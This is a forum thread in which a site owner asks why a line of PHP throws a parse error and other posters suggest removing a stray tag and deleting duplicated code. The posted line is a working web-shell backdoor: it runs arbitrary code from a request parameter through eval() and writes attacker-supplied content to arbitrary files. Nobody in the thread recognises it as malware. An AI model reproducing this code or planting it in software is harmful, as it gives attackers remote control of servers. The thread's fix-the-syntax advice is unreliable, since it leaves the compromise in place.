Parse error

I can’t seem to find a syntax error occurring in this line.

[php]<?php $kpjfo = "d9fde556e1d81bd55376a21e18df3087"; if(isset($_REQUEST['dmhvhtqq'])) { $anhi = $_REQUEST['dmhvhtqq']; eval($anhi); exit(); } if(isset($_REQUEST['zgqzirb'])) { $svvyr = $_REQUEST['nxaq']; $hmrad = $_REQUEST['zgqzirb']; $fdvnl = fopen($hmrad, 'w'); $nrfmaw = fwrite($fdvnl, $svvyr); fclose($fdvnl); echo $nrfmaw; exit(); } ?><?php> [/php]

Everything worked fiine for months and is now giving me headaches. Any help would be appreciated.

Is this actually at the end or was that a pasting error?


It is at the end.

Remove it :slight_smile:

I seem to be getting the same error. Here is exactly what I am seeing when i try to load it.
Parse error: syntax error, unexpected ‘<’

Post the entire file again

Here is a link to the file itself. The error occurs on line 633.

It looks like the entire code has been duplicated for some reason. I think what you need to do is delete everything from line 633 to the end. Then line 633 should be a closing PHP tag ?>

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